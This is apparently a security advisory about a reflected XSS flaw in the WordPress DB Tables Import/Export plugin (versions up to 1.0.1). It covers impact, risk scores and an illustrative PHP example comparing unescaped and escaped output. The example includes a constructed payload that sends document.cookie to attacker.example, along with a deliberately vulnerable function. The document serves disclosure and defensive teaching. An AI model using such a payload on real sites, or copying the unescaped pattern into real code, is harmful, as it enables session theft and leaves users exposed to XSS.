Impact
This vulnerability is an instance of improper neutralization of input during web page generation (CWE-79): the plugin takes attacker-controlled request data and writes it into the generated page without escaping it for the HTML context it lands in. Because the payload is reflected straight back in the response, the attacker delivers it by getting a victim to open a crafted link or submit a crafted request; the injected script then runs in the victim's browser under the site's origin. From there it can read cookies that are not flagged HttpOnly, issue requests with the victim's privileges (including, for an administrator, the actions the plugin itself exposes), or alter what the page displays. The root cause is a missing output-encoding step rather than a failure to validate input, which is why the fix is context-appropriate escaping at the point of output.
Affected Systems
The flaw exists in the WordPress DB Tables Import/Export plugin developed by Alberto Cocchiara, in all versions up to and including 1.0.1. Any installation running one of these versions is affected, whether or not the import/export functionality is in regular use. No fixed release is identified here; sites on 1.0.1 or earlier should upgrade to a later version if one is available, or deactivate the plugin.
Risk and Exploitability
A CVSS score of 7.1 falls in the High band (7.0 to 8.9) of CVSS v3.x. The EPSS score below 1% indicates a low estimated probability of exploitation in the wild at present, and the flaw is not listed in CISA's KEV catalog, so there is no evidence of active exploitation. As a reflected XSS the attack is web-based and requires user interaction: the attacker must get a victim, typically a logged-in user with access to the plugin's pages, to open a crafted URL or submit a crafted form whose parameter the plugin echoes into the page. The script executes only in that victim's session, so the practical impact scales with the privileges of the user who is tricked.
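The pattern behind the Impact and Risk and Exploitability sections, as an added example that is not the plugin's own code: a request parameter echoed unescaped into an admin page beside the same page with context-appropriate escaping. The parameter name `table`, the page layout and the helper names are hypothetical, since the advisory does not name the injection point; the `esc_html()`/`esc_attr()` fallbacks exist only so the file runs under plain `php` outside WordPress, where those functions are provided by core.

```php
<?php
// Added example, not the plugin's code. The parameter name "table" and the
// page markup are hypothetical; the advisory does not name the injection point.

// Stand-alone fallbacks so this runs under `php` outside WordPress.
// Inside WordPress the core esc_html()/esc_attr() functions are used instead.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

/**
 * Vulnerable pattern (CWE-79): request data is concatenated straight into HTML.
 * Whatever arrives in $params['table'] becomes markup in the response.
 */
function render_export_form_vulnerable(array $params): string {
    $table = $params['table'] ?? '';
    return '<p>Exporting table: ' . $table . '</p>'
         . '<input type="text" name="table" value="' . $table . '">';
}

/**
 * Hardened pattern: escape for the exact context the value lands in.
 * esc_html() for text nodes, esc_attr() for attribute values; the browser
 * now renders the payload as literal text instead of executing it.
 */
function render_export_form_fixed(array $params): string {
    $table = $params['table'] ?? '';
    return '<p>Exporting table: ' . esc_html($table) . '</p>'
         . '<input type="text" name="table" value="' . esc_attr($table) . '">';
}

/**
 * Reflection check used by both cases below: does the raw payload survive
 * into the output as a script tag (i.e. is it reflected unneutralized)?
 */
function reflects_script(string $html): bool {
    return strpos($html, '<script>') !== false;
}

// Constructed attacker input of the kind a crafted link would carry:
// closes the attribute, then injects a script that exfiltrates document.cookie.
$payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';
$request = ['table' => $payload];

echo "VULNERABLE:\n" . render_export_form_vulnerable($request) . "\n\n";
echo "FIXED:\n"      . render_export_form_fixed($request) . "\n\n";

echo 'vulnerable reflects <script>: ' . var_export(reflects_script(render_export_form_vulnerable($request)), true) . "\n";
echo 'fixed reflects <script>:      ' . var_export(reflects_script(render_export_form_fixed($request)), true) . "\n";
```

Escaping is chosen per context: a value that ends up inside a JavaScript string or a URL needs `esc_js()` or `esc_url()` rather than `esc_html()`. WordPress capability checks (`current_user_can()`) and nonces (`check_admin_referer()`) restrict who can reach the plugin's pages but do not replace output escaping, because the reflected payload executes in the session of a user who is already allowed there.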